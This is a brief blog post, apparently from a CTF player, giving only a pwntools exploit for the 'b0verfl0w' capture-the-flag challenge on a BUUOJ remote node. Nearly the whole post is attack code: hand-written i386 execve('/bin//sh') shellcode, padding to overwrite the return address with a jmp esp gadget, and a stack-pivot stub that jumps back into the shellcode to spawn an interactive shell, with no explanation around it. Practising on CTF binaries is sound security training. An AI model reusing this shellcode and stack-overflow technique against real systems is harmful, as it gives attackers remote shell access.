x_ctf_b0verfl0w

exp

from pwn import *

context.binary = './b0verfl0w'
#io = process('./b0verfl0w')
io = remote('node3.buuoj.cn','27459')
jmp_esp = 0x8048504

shellcode = "\x68\xcd\x80\x68\x68\xeb\xfc\x68"
shellcode += "\x6a\x0b\x58\x31\xd2\x52\x68\x2f"
shellcode += "\x2f\x73\x68\x68\x2f\x62\x69\x6e"
shellcode += "\x89\xe3\x52\x53\x89\xe1\xeb\xe1"

payload = shellcode
payload = payload.ljust(0x24,'a')
payload += p32(jmp_esp)
payload += asm('sub esp,0x28;jmp esp')

io.sendline(payload)

io.interactive()

posted @ 2020-08-04 14:38 PwnKi 阅读(404) 评论(0) 编辑收藏举报

刷新页面返回顶部

PwnKi

x_ctf_b0verfl0w

exp

公告